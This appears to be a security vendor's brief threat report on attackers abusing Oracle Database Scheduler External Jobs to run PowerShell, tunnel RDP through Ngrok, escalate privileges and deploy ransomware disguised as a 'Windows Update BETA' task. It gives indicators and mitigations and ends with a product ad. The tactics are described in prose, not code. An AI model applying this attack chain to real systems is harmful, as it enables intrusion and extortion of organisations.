Infographic depicting threat actors exploiting Oracle Database Scheduler with extjobo.exe for command execution, Ngrok tunneling, and ransomware staging on a corporate server network.

Threat actors exploit Oracle Database Scheduler's External Jobs via extjobo.exe to run arbitrary commands on corporate servers, enabling stealthy access and ransomware deployment. In a breach, attackers used valid SYSDBA credentials on an exposed instance to execute Base64 PowerShell scripts for system reconnaissance, remote commands via WSMan, and payload downloads (e.g., tfod.cmd) from C2 80.94.95.227—creating a reverse shell from GitHub code—before deleting files.

Infographic depicting threat actors exploiting Oracle Database Scheduler with extjobo.exe for command execution, Ngrok tunneling, and ransomware staging on a corporate server network.Infographic depicting threat actors exploiting Oracle Database Scheduler with extjobo.exe for command execution, Ngrok tunneling, and ransomware staging on a corporate server network.

They tunneled RDP (port 3389) with Ngrok, created/elevated an "Admine" account using Process Hacker (PT.exe) and token manipulation, then staged ransomware ("win.exe") scheduled as "Windows Update BETA" under SYSTEM. This encrypted files with a new extension, dropped "ElonsHelp.txt" note, and logged in mcv.dll. Cleanup erased tools, tasks, and disabled Ngrok persistence.

Infographic depicting threat actors exploiting Oracle Database Scheduler with extjobo.exe for command execution, Ngrok tunneling, and ransomware staging on a corporate server network.Infographic depicting threat actors exploiting Oracle Database Scheduler with extjobo.exe for command execution, Ngrok tunneling, and ransomware staging on a corporate server network.

Mitigations: Restrict Oracle ports, disable External Jobs if unused, enforce MFA, monitor extjobo.exe/PowerShell anomalies, whitelist tunneling tools, and use tamper-proof backups.
 
NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security